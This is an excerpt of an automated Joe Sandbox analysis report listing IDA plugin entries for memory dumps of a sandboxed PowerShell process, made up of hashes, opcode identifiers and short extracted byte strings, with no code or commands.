                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r$tP;r$tP;r$$;r
                                    • API String ID: 0-3094404260
                                    • Opcode ID: 99ca5239e94f342f33b32af0a744c69c68559631ea0d38c1f3dd13d103682e7c
                                    • Instruction ID: e5ef5e8ff851fee1b47d855dcd58557427626584b19f2ab1c1bbedce2c50c21b
                                    • Opcode Fuzzy Hash: 99ca5239e94f342f33b32af0a744c69c68559631ea0d38c1f3dd13d103682e7c
                                    • Instruction Fuzzy Hash: E8B13A31F00345DFDBA49BACD4047ABBBB6AFC5214F24907AD515CB291DA32CA43C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r$$;r$$;r$$;r
                                    • API String ID: 0-1141978700
                                    • Opcode ID: 7e7e6abe3d352c3bfb823276177cc8d1fbd3df03268750de21b18c4312433cb2
                                    • Instruction ID: 47f404e6dad6ca4f48206f76f07961cb66ddc58633bfc79ad9caedbc640b0578
                                    • Opcode Fuzzy Hash: 7e7e6abe3d352c3bfb823276177cc8d1fbd3df03268750de21b18c4312433cb2
                                    • Instruction Fuzzy Hash: 0E815A32B043449FD7A49A6CD5017AABBA6AFC5214F24857AD446CB391DB32CE43C7E1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$tP;r$tP;r$$;r$(Ar$(Ar$(Ar
                                    • API String ID: 0-2953425239
                                    • Opcode ID: 7d8a26fc10e6ed247a6e9d1db7193a403e3fb0d1438849c48d778f43e2ba734b
                                    • Instruction ID: ff6e1810d6bd5261f267a6ce53dee0058f58952204d567b87123fa0f1e75ca83
                                    • Opcode Fuzzy Hash: 7d8a26fc10e6ed247a6e9d1db7193a403e3fb0d1438849c48d778f43e2ba734b
                                    • Instruction Fuzzy Hash: C971E834B10311DFDBA4CF18C548BAAB7E2EF84354F19919AE905AF291D731DD42CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$TQ@r$TQ@r$tP;r$$;r$$;r$$;r
                                    • API String ID: 0-2253605028
                                    • Opcode ID: 13ac03a4fae5456d25e549de89e09a85edbf107c07a30c51ab7c44fd4b065c3a
                                    • Instruction ID: 76dfc33da978a1033c7038824c9c66d54ba45aaef9c0fa9ccb0854f94220b5ed
                                    • Opcode Fuzzy Hash: 13ac03a4fae5456d25e549de89e09a85edbf107c07a30c51ab7c44fd4b065c3a
                                    • Instruction Fuzzy Hash: 1251B631A00305DFDBA4CF05C60CBBA73A1AF44319F58A1A6E8059F6A1C736DD87CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Tk$4';r$4';r$4';r$4';r$DUk
                                    • API String ID: 0-1327216166
                                    • Opcode ID: f608ee63ad62513a3cfee929aaa636abb0e9aeb429c4e7138ae8ad10d0aac290
                                    • Instruction ID: 78f9a16469463c326ecfd17deff232f0cd4513383ddee3f8e08d4da59740afae
                                    • Opcode Fuzzy Hash: f608ee63ad62513a3cfee929aaa636abb0e9aeb429c4e7138ae8ad10d0aac290
                                    • Instruction Fuzzy Hash: 3AD108B5F00304CFDB949F69D8447AAB7E6AFC9214B2590BAD505CF255FB32C842CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-4098155347
                                    • Opcode ID: 581860d0c4a3d8e622d61a53097f38baba4713a3ce5befb9b17dbdc1f9df430b
                                    • Instruction ID: b2d558d5fdfa5c846b50e45f77406f3dcf8d55fdc4eb6dc2df47fab98d178711
                                    • Opcode Fuzzy Hash: 581860d0c4a3d8e622d61a53097f38baba4713a3ce5befb9b17dbdc1f9df430b
                                    • Instruction Fuzzy Hash: C3614731B04358DFDB949F68DC087AABBA9AF81325F24D07AE445CB641CB36D843C791
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$d%Ar$d%Ar$d%Ar$tP;r$$;r
                                    • API String ID: 0-2493341346
                                    • Opcode ID: b1bcfed1742b7ff61597b54891f2f8f8b7dbf7253c058c5eaf7dd3d671fd5b83
                                    • Instruction ID: c5265a1d74088aa790d7d64370dab5b2c34ae4eea0c5586b9ea26796239598cd
                                    • Opcode Fuzzy Hash: b1bcfed1742b7ff61597b54891f2f8f8b7dbf7253c058c5eaf7dd3d671fd5b83
                                    • Instruction Fuzzy Hash: 1351A330F10305DFDBA4CE14CD44BAAF7A6AF88254F259195E805AF291DB32DD46CBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r$$k
                                    • API String ID: 0-1503287806
                                    • Opcode ID: 90d52f6754b4f7aa8c71f9e7bd89da2ff236ce2d20c0f56465c2de8158035685
                                    • Instruction ID: 5a4c2204cf205372cb02f4fc85aa6288193a2b6f487b7ef4d221602010f8bfbf
                                    • Opcode Fuzzy Hash: 90d52f6754b4f7aa8c71f9e7bd89da2ff236ce2d20c0f56465c2de8158035685
                                    • Instruction Fuzzy Hash: C6813B31F043519FD7A45AAEC8057BBBBA6AFC5214F14807AD506CB281DB72CA43C7E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XR@r$XR@r$tP;r$tP;r$$;r
                                    • API String ID: 0-2935172430
                                    • Opcode ID: 20a55abee783a1a59ebef450353942e5e0dd8ddd1c331c40b55a8f2379c779e1
                                    • Instruction ID: 72271386326bc5637dcbddc3d4e3a000e1ba4708f55f82743be87d58549c2e5d
                                    • Opcode Fuzzy Hash: 20a55abee783a1a59ebef450353942e5e0dd8ddd1c331c40b55a8f2379c779e1
                                    • Instruction Fuzzy Hash: E851C431B003119FE754DB68D944BAAB7E6AFC8354F248069E9029F382DB32DC42C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r
                                    • API String ID: 0-3267477724
                                    • Opcode ID: 74776cf84f125793ab46633dd1500f283a357efa77d3eb3fb43c367440b9dfad
                                    • Instruction ID: 64f6f60f1701d74c1cd6f5ee12e44805896e0de66287d4cf2da0d3e42321c411
                                    • Opcode Fuzzy Hash: 74776cf84f125793ab46633dd1500f283a357efa77d3eb3fb43c367440b9dfad
                                    • Instruction Fuzzy Hash: F2410935B00315DFDBA85A29D5047BAB7969FC6215B24906AD8028F691DF32CC43CFA3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r$$;r
                                    • API String ID: 0-3267477724
                                    • Opcode ID: 1d6bcf68a9edb89c711e3d2c94c3a2dc76e33d49d2e64e1affa2930fb00ae7bd
                                    • Instruction ID: 8e4bda2210d5efd7a416598cf56071b30edaf7ba44e29f601926f37d98d7cf75
                                    • Opcode Fuzzy Hash: 1d6bcf68a9edb89c711e3d2c94c3a2dc76e33d49d2e64e1affa2930fb00ae7bd
                                    • Instruction Fuzzy Hash: 67412635F00305CFEBA45B6989087BAB7E9AF84254F24917AD405CF241EF32C947C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$tP;r$$;r$$;r$$;r
                                    • API String ID: 0-4019525536
                                    • Opcode ID: e549437f87fff5e147793be630c5748a74f4d4933af0fce458a3087cfca744ad
                                    • Instruction ID: d014634a16a3699b2d66507bad518334df835af21704ba529cb6779bf2716136
                                    • Opcode Fuzzy Hash: e549437f87fff5e147793be630c5748a74f4d4933af0fce458a3087cfca744ad
                                    • Instruction Fuzzy Hash: 5331C830E10300EFEBA4CE55CE40BA977A1AF44325F18E1B5D5255F292C736D842CBE1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$$;r$$;r$$;r$$;r
                                    • API String ID: 0-3614991455
                                    • Opcode ID: 513193d4f15612098b492719faf8bb6b6186b5fc1ee1f9db7c2745293914b0ab
                                    • Instruction ID: 3961c3ccc42fbc1a4869784ecc70ca1a1b37bb96e73805f76930adf788f42411
                                    • Opcode Fuzzy Hash: 513193d4f15612098b492719faf8bb6b6186b5fc1ee1f9db7c2745293914b0ab
                                    • Instruction Fuzzy Hash: 6731D779A04744FFDBB54E09C940AB37BB4AF43259F1861A6E8048B5D1C735C986CBA3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$d%Ar$d%Ar$d%Ar$tP;r
                                    • API String ID: 0-3877811654
                                    • Opcode ID: d2b3e2a153d37f27a88b2fd358ae25813d5547bc55bfca25352ca8d756fbd88b
                                    • Instruction ID: 2cf28865658e1c099b51475af1783ccbd6ce0982d023321d76c25ead9f391cdf
                                    • Opcode Fuzzy Hash: d2b3e2a153d37f27a88b2fd358ae25813d5547bc55bfca25352ca8d756fbd88b
                                    • Instruction Fuzzy Hash: 8831AB34F003109FDBA4DF58C854BAAFBA2EF98754B258185E805AB381C732ED02CBD1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$tP;r$tP;r
                                    • API String ID: 0-3204662951
                                    • Opcode ID: bcd2b91caa6fe625fc4980a5fcddc793beb1cbc05e119840e44c5a14d2f53103
                                    • Instruction ID: 82938ec3cc5608899699bef97e11d5ffccb2001c6ff95172f4a34d82c0d2ed9d
                                    • Opcode Fuzzy Hash: bcd2b91caa6fe625fc4980a5fcddc793beb1cbc05e119840e44c5a14d2f53103
                                    • Instruction Fuzzy Hash: C9815C31F003419FDFA45B69D8147BBB7A6AFC5314F2494AAE545CB281DA32CC47C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$4';r$4';r
                                    • API String ID: 0-229571521
                                    • Opcode ID: a7b53274b440d209269146176a13fcece69aadf06967ca7c8f74abfa08241cad
                                    • Instruction ID: b35c41e78b0bc9d8d9517b729678cd79b06a556c5353f083700693c86a602841
                                    • Opcode Fuzzy Hash: a7b53274b440d209269146176a13fcece69aadf06967ca7c8f74abfa08241cad
                                    • Instruction Fuzzy Hash: 8B714935F00345DFDB949E6885017BAB7A99FC4A94F34917AD406DB241EB32C943C7E2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2080979458.0000000000B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_b50000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: (?r$H?r$H?r$P
                                    • API String ID: 0-3463578099
                                    • Opcode ID: 24b5489a0d6762d8c2fea4a7a4cae9513c35e809a384e5f146861417965234bb
                                    • Instruction ID: 9fb7e60957620fd893cd5553d306250ddacca09e1c677b25ade1eb0a74161833
                                    • Opcode Fuzzy Hash: 24b5489a0d6762d8c2fea4a7a4cae9513c35e809a384e5f146861417965234bb
                                    • Instruction Fuzzy Hash: C14112327052141BEB55AA79A9243BF6BDBEFC4351B1485B8E80ACB381DF35DC0283D2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XR@r$XR@r$tP;r$$;r
                                    • API String ID: 0-2885941037
                                    • Opcode ID: e11d6ff1772f9891cc41aafa5aa0ed5be5eda74941099a3c145a82c35c63b3f8
                                    • Instruction ID: 9600f6973315e37fdbaf5b47cc88e85f698e2f447c691a4c0e55a73f46e42f06
                                    • Opcode Fuzzy Hash: e11d6ff1772f9891cc41aafa5aa0ed5be5eda74941099a3c145a82c35c63b3f8
                                    • Instruction Fuzzy Hash: F0419431E00305DFDBA4CF19D544BAAB7E2AF88359F28D0A9D416AF251D732DD86CB90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r$$;r$$;r
                                    • API String ID: 0-2421127452
                                    • Opcode ID: 7d317d3d8c689e156df2722884a75fa2ae1a0c8cfebbcd4a18fa242d8874979c
                                    • Instruction ID: 3546273adf5c10903312265ea34a111ec3fd98dd0172aa7f6aae02e9a92c4e2a
                                    • Opcode Fuzzy Hash: 7d317d3d8c689e156df2722884a75fa2ae1a0c8cfebbcd4a18fa242d8874979c
                                    • Instruction Fuzzy Hash: FB217D31B003469FEBB8597A5C04B7BB6869FC0619F20943ADB05CB381DD76CA43C361
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $;r$$;r$$;r$$;r
                                    • API String ID: 0-2421127452
                                    • Opcode ID: 4e495a9706f9bb32efa54aa9c69325123d619a18fe518929258f305d3a5030ef
                                    • Instruction ID: c217995d0702e7f81afbf1a2b4cb621dfd688b9528cbaef4f9e1137c344c4388
                                    • Opcode Fuzzy Hash: 4e495a9706f9bb32efa54aa9c69325123d619a18fe518929258f305d3a5030ef
                                    • Instruction Fuzzy Hash: 7411D639E04305DFDFF49E598E406B6B7A4BF40B19F14617AC80897643D736C546C792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000007.00000002.2109586139.0000000006ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06ED0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_7_2_6ed0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4';r$4';r$$;r$$;r
                                    • API String ID: 0-1880743479
                                    • Opcode ID: 4e24e7250d3cdefd360d60485494430cd18acf8447af0f7c2049e14217091984
                                    • Instruction ID: e1af4260b72bf9ee0ec20a1cccb33fdd47ff757ef0334f900208471155a45132
                                    • Opcode Fuzzy Hash: 4e24e7250d3cdefd360d60485494430cd18acf8447af0f7c2049e14217091984
                                    • Instruction Fuzzy Hash: 3F01A22170D3D14FD7AB16281824AA56BB64FC3640B2D41D7D482CF793CD198D0783A7